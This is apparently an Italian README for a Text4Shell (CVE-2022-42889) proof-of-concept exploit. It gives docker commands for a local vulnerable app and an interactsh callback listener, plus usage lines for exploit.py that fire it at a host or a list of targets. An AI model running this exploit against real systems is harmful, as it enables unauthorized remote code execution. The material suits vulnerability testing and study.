
CVE-2022-42889 - Text4Shell exploit
Questa è una Proof of Concept che sfrutta la vulnerabilità in Apache Commons Text [CVE-2022-42889]
Versioni vulnerabili : da 1.5.0 a (esclusa) 1.10.0
Lo sfruttamento riuscito di questa vulnerabilità consente a un utente malintenzionato non autenticato di eseguire codice arbitrario sul sistema vulnerabile
Applicazione sviluppata da @securekomodo, allegata qui.
Questa applicazione può anche essere caricata dal docker-registry
docker run -p 8080:8080 gokul2/text4shell-poc:latest
L'applicazione sarà ora disponibile su localhost:8080.
Per verificare l'esecuzione arbitraria di comandi, utilizziamo interactsh, uno strumento per catturare interazioni OOB di @projectdiscovery.
Configura il client interactsh prima di eseguire l'exploit vero e proprio.
docker run projectdiscovery/interactsh-client:latest
Prendi nota del dominio elencato dopo l'avvio dell'applicazione
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Controlla i log nel client interactsh per convalidare l'exploit.